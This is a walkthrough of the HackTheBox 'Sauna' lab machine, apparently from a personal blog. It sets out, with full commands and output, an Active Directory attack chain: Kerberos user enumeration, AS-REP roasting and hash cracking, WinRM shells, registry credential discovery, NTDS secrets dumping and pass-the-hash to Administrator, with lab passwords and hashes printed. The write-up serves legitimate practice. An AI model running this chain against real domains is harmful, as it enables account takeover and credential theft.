HTB Sauna Walkthrough
Welcome to the HackTheBox Sauna walkthrough, a technical how-to guide to hacking the Sauna box.
Welcome to another of my HTB walkthroughs! I found Sauna to be a really onerous machine, I don't mean difficult because the difficulty is relative, what can be complex for me can be simple for others. I'm at the beginning and I'm still a newbie in this area, I have much more to learn, but if you are here to read this tutorial, we are probably in the same boat. Lets jump right in!
We start off with our usual nmap command:
nmap -p 1-65535 -T4 -A -v 10.10.10.175And I report only the list of the open ports:
PORT STATE SERVICE VERSION
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-03-15 00:15:05Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap?
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open unknown
49673/tcp open unknown
49675/tcp open unknown
49686/tcp open unknown
55454/tcp open unknownMy first approach was to search the specified port on exploit-db. Nothing particular to highlight, lots of exploits,but I need a direction. There's a Web Portal on the server, with IIS, this could be another attack point. Looking at this, I found on the about page some employees of the company (name and surname).
I start to have an idea, confirmed after reading in the forum. These people can have an account on the machine, we just have to understand the username used for each one. We can prepare a list of usernames created with standard rules that are usually used to create a domain account (name.surname, the first letter of the name and the full surname, and so on). Well, I put inside also the standard user (administrator, guest, etc...) and finally my list was about 150 records.
At this point I start a brute-forcing with the smb_login exploit on metasploit framework, but, after many tries, I got nowhere. I tried with different dictionaries, but nothing. I repeat the exploit thinking to have lost some output from the console. Nothing. So I go to read in the forum for tips and I read the simplest sentence that made no sense but "turned on" the light; something like "nice hint on the picture". Looking the picture you can read the number 88, so I understand that I have to concentrate on that port. But on the 88 port there is a kerberos service, so I proceed to identify a possible exploit on it.
msf5 > search kerbero
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/kerberos/ms14_068_kerberos_checksum 2014-11-18 normal No MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
1 auxiliary/gather/get_user_spns 2014-09-27 normal No Gather Ticket Granting Service (TGS) tickets for User Service Principal Names (SPN)
2 auxiliary/gather/kerberos_enumusers normal No Kerberos Domain User Enumeration
3 auxiliary/scanner/winrm/winrm_login normal No WinRM Login Utility
4 post/windows/escalate/golden_ticket normal No Windows Escalate Golden Ticket
Really good, five exploits and the third one attracts my attention, "enumeration". I don't lose other time, study this exploit and use it. During the execution it all works fine until the process arrives at the username "fsmith", that produces an error. I try it again, but the process stops exactly with this user, so, I truncated the list and continued with the enumeration. No other user provides an error. I understand that probably this is my attack point (should be an error on the script that I have to correct, but let to go on for now).
msf5 > use auxiliary/gather/kerberos_enumusers
msf5 auxiliary(gather/kerberos_enumusers) > options
Module options (auxiliary/gather/kerberos_enumusers):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN yes The Domain Eg: demo.local
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 88 yes The target port
Timeout 10 yes The TCP timeout to establish connection and read data
USER_FILE yes Files containing usernames, one per line
msf5 auxiliary(gather/kerberos_enumusers) > set domain .
domain => .
msf5 auxiliary(gather/kerberos_enumusers) > set rhosts 10.10.10.175
rhosts => 10.10.10.175
msf5 auxiliary(gather/kerberos_enumusers) > set user_file work-on-this.txt
user_file => work-on-this.txt
msf5 auxiliary(gather/kerberos_enumusers) >
[...]
[*] Using domain: EGOTISTICALBANK...
[*] 10.10.10.175:88 - Testing User: "fsmith"...
[-] Auxiliary failed: NoMethodError undefined method `error_code' for #<Rex::Proto::Kerberos::Model::KdcResponse:0x000055a3a6e83b00>
[-] Call stack:
[-] /usr/share/metasploit-framework/modules/auxiliary/gather/kerberos_enumusers.rb:74:in `block in run'
[-] /usr/share/metasploit-framework/modules/auxiliary/gather/kerberos_enumusers.rb:65:in `each'
[-] /usr/share/metasploit-framework/modules/auxiliary/gather/kerberos_enumusers.rb:65:in `run'
[*] Auxiliary module execution completed
Ok, I have an account, a DOMAIN name (you can see at the start of the process), but I have to understand how to attack the kerberos service. I search on google for a little and finally, I found this: https://www.tarlogic.com/en/blog/how-to-attack-kerberos/. Good, my next tool will be impacket.
in7rud3r@kali:~/Dropbox/hackthebox/_Sauna - 10.10.10.175/attack/impacket/examples$ sudo python3 GetNPUsers.py EGOTISTICALBANK/fsmith -format hashcat -outputfile ../../fsmith.hash -dc-ip 10.10.10.175
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
Password:
[*] Cannot authenticate fsmith, getting its TGT
$krb5asrep$23$fsmith@EGOTISTICALBANK:d2c96f571f61f3bd4a076921c435cf32$c9b239a5aa12b5bb81981651f87cb3f9837d20a713167932f90d5213cb07528fb714cff2189f57496b3fc695c070a719632816abfd0eede593dce8f9d1d1fe41debd87a2bef58337429c6a681f1f08163c74499ffba1d12e6ffa91418f0107ca047b795926473b49f02c530f5bcd2804438b45fc8dbc9ff67c3a5eaed8dd9bcf3011ba7c79212810ae4abc43a0643cf3cae58967b6e0f61ac4d690020b42a039f1f234d2e61e627876fbc1b51a280ffdeea9a10665af99dae5e094d1d96894a60f63bb634e3cdcb2eadf471e09a74c2005a4a4cac0c3131fac78938f51eb16b699bb335a0a1225c3226664574e2c40b6596ad5abc8a27de7eeI used the command in the first way I found and it asks me for the password of the user, when I enter without a password the tool automatically takes the TGT hash, but to be precise, the command could be launched with the parameter -request and it immediately takes what you need.
Moving forward there are two different tools you can use to revert an hash, john the ripper or hashcat; I prefer the second one.
in7rud3r@kali:~/Dropbox/hackthebox/_Sauna - 10.10.10.175/attack$ hashcat -m 18200 --force -a 0 fsmith.hash /usr/share/wordlists/rockyou.txt
hashcat (v5.1.0) starting...
OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM)2 Duo CPU T8300 @ 2.40GHz, 1024/2900 MB allocatable, 2MCU
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=18200 -D _unroll'
* Device #1: Kernel m18200_a0-pure.e76a9994.kernel not found in cache! Building may take a while...
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s
$krb5asrep$23$fsmith@EGOTISTICALBANK:25834f0ffe3b173de8636f4cbb2874ed$20fa322b00d05c32855ea95415e62e5c722def4c3c43f0bc7812b5785655c1d039ceb1cd753acb618ae27bcb6e35179f6d8e43e8806a6504245659728984395308b176ee9cff499c07ee378feef8b5225ea2212e5578096efbc64a542c44493b602f4b159283fed9206a3c0871b84926b4a039217239db4d5ce3efacc9b179150b736a724839e1e5726304ad500cf9287c350cb555e545342c9fd5fedc1436c65f5ab122c44ef0a80b260099e14caa771d48b131adffa03073a1ac21c1a97891cb4f6fa70977d8175cd80cf093518dfc2b2fa7703a2d4436b0eea7899525556267e0571d2b4656b372bbee9ea0e7cd3d5b900f65aed45010d1:Thestrokes23
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$fsmith@EGOTISTICALBANK:25834f0ffe3b17...5010d1
Time.Started.....: Sat Mar 21 14:21:32 2020 (1 min, 28 secs)
Time.Estimated...: Sat Mar 21 14:23:00 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 120.9 kH/s (10.32ms) @ Accel:32 Loops:1 Thr:64 Vec:4
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10539008/14344385 (73.47%)
Rejected.........: 0/10539008 (0.00%)
Restore.Point....: 10534912/14344385 (73.44%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: Tioncurtis23 -> Thelittlemermaid
Started: Sat Mar 21 14:21:10 2020
Stopped: Sat Mar 21 14:23:01 2020
The number 18200 I use in the command is the algorithm type of the hash that is used to recover the keyword, based on the specifics described in the table reported on this page https://hashcat.net/wiki/doku.php?id=example_hashes.
Ok, I have a username, a password and a windows machine... Evil-WinRM.
in7rud3r@kali:~/Dropbox/hackthebox/_Sauna - 10.10.10.175/attack$ sudo docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.175 -u EGOTISTICALBANK\\fsmith -p 'Thestrokes23' -s '/ps1_scripts/' -e '/exe_files/'
Evil-WinRM shell v2.1
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents>
*Evil-WinRM* PS C:\Users\FSmith\Documents> pwd
Path
----
C:\Users\FSmith\Documents
*Evil-WinRM* PS C:\Users\FSmith\Documents> ls ..
Directory: C:\Users\FSmith
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 1/23/2020 10:01 AM Desktop
d-r--- 3/21/2020 1:49 PM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Favorites
d-r--- 9/15/2018 12:19 AM Links
d-r--- 9/15/2018 12:19 AM Music
d-r--- 3/21/2020 1:17 PM Pictures
d----- 9/15/2018 12:19 AM Saved Games
d-r--- 9/15/2018 12:19 AM Videos
*Evil-WinRM* PS C:\Users\FSmith\Documents> ls ../Desktop
Directory: C:\Users\FSmith\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/23/2020 10:03 AM 34 user.txt
*Evil-WinRM* PS C:\Users\FSmith\Documents> type ../Desktop/user.txt
1******************************f
And the first flag is mine! After this, I lose a huge amount of time understanding what I have to do. I navigated through the folders, searching for some information left unsecured, I executed the whoami command, searched hidden folders, tried to execute commands on the machine, export the SYSTEM voice on the HKLM registry file to try to hack the ntds.dit file, and so on, but nothing. I have to back to the forum (yeah, I know I'm a bit lazy) and found a useful tip, a comment that mentioned the tool w**PEAS... We are working on a windows machine, it's not so complex to understand that probably the full name of the tool is winPEAS (https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite). I'm right. So again, proceed to study the tool and act the exploit.
Well, I download the tool and upload on the remote machine through the related command of Evil-WinRM. The tool took a long time to extract the information of the machine. I was impressed with the amount of information he managed to extract and it took me a long time to read the whole report, but in the end, I found something interesting.
[...]
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] Files an registry that may contain credentials <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Searching specific files that may contains credentias.
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files
Looking inside HKCU\Software\ORL\WinVNC3\Password
Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password
Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
DefaultDomainName REG_SZ EGOTISTICALBANK
DefaultUserName REG_SZ EGOTISTICALBANK\svc_loanmanager
DefaultPassword REG_SZ Moneymakestheworldgoround!
Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP
[...]
This user could be used to some service autostart or to login into the machine automatically, but this is not important, what is important is that I have another password, but, there's something strange, the user is not what I have found on the users' folder of the machine.
*Evil-WinRM* PS C:\Users\FSmith\Documents> ls ../..
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/25/2020 1:05 PM Administrator
d----- 1/23/2020 9:52 AM FSmith
d-r--- 1/22/2020 9:32 PM Public
d----- 1/24/2020 4:05 PM svc_loanmgr
Anyway, I have to try and understand if it is a valid password or not.
in7rud3r@kali:/home/foo/data$ sudo docker run --rm -ti --name evil-winrm-2 -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.175 -u EGOTISTICALBANK\\svc_loanmanager -p 'Moneymakestheworldgoround!' -s '/ps1_scripts/' -e '/exe_files/'
[sudo] password for in7rud3r:
Swipe your right index finger across the fingerprint reader
Evil-WinRM shell v2.1
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
As I supposed, I try the user I think is the real one.
in7rud3r@kali:/home/foo/data$ sudo docker run --rm -ti --name evil-winrm-2 -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.175 -u EGOTISTICALBANK\\svc_loanmgr -p 'Moneymakestheworldgoround!' -s '/ps1_scripts/' -e '/exe_files/'
Evil-WinRM shell v2.1
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents>
Great, but I'm not the administrator. So again I spend a lot of time to understand what I need to do to go on and complete the machine. This time the forum doesn't help me (but I was concentrated on the wrong post). Someone was suggesting to use a bloodhound tool to investigate the machine's entities; from the official github page "BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment".
I download it, install it, use it, upload a file to export information from the remote machine, import in the tool and deepen in the graph of the machine, searching useful information. I found also something interesting for sure, this is an alternative way to my final solution I adopt to take the second flag, but in my case, what I found didn't work for me. I don't know if the exploit that this tool suggested me was the correct one (mimikatz). I try to use it in all ways, but it stops for errors (something related with the PowerShell that I was connected to I suppose), but I have to search another way. The forum suggests two simple words that drive me on the right decision: secret and dump. I identify secretsdump.py, another tool of the impacket kits.
in7rud3r@kali:~/Dropbox/hackthebox/_Sauna - 10.10.10.175/attack/impacket/examples$ sudo python secretsdump.py EGOTISTICALBANK/svc_loanmgr:"Moneymakestheworldgoround!"@10.10.10.175
Impacket v0.9.21.dev1+20200313.160519.0056b61c - Copyright 2020 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:8914a5faf0ea6625c5793685b8055117:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:83a8b70cc5c7c52c671dffc79a6adce3f51146b482011f6638ce8b79088823ab
SAUNA$:aes128-cts-hmac-sha1-96:e54efb10e8049b98e008163080244446
SAUNA$:des-cbc-md5:6837e9a2ea0852bc
[*] Cleaning up...
Others hash to decrypt, we already use below the hashcat tool, so come back to the table with the algorithm to identify the right one and proceed (#1000).
in7rud3r@kali:~/Dropbox/hackthebox/_Sauna - 10.10.10.175/attack$ hashcat -m 1000 -a 0 --force admin.hash /usr/share/wordlists/rockyou.txt
hashcat (v5.1.0) starting...
OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM)2 Duo CPU T8300 @ 2.40GHz, 1024/2900 MB allocatable, 2MCU
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=3 -D DGST_R2=2 -D DGST_R3=1 -D DGST_ELEM=4 -D KERN_TYPE=1000 -D _unroll'
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Type........: NTLM
Hash.Target......: d9485863c1e9e05851aa40cbb4ab9dff
Time.Started.....: Sun Mar 22 18:23:29 2020 (15 secs)
Time.Estimated...: Sun Mar 22 18:23:44 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1030.5 kH/s (0.73ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]
Started: Sun Mar 22 18:23:26 2020
Stopped: Sun Mar 22 18:23:45 2020
What? an unexpected surprise! Now? I have to try other dictionaries, but then I think that it will be nice if I could direct the hash to connect to the machine, so, a fast check on the Evil-WinRM tool and... Fantastic, I can!
in7rud3r@kali:~/Dropbox/hackthebox/_Sauna - 10.10.10.175$ sudo docker run --rm -ti --name evil-winrm-2 -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.175 -u EGOTISTICALBANK\\Administrator -H d9485863c1e9e05851aa40cbb4ab9dff -s '/ps1_scripts/' -e '/exe_files/'
[sudo] password for in7rud3r:
Swipe your right index finger across the fingerprint reader
Evil-WinRM shell v2.1
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
---------------------------------------------------------
*Evil-WinRM* PS C:\Users\Administrator\Documents> more ../Desktop/root.txt
f******************************fThats the last flag! But let me say that this was a really complex machine for me this time, a real sauna!
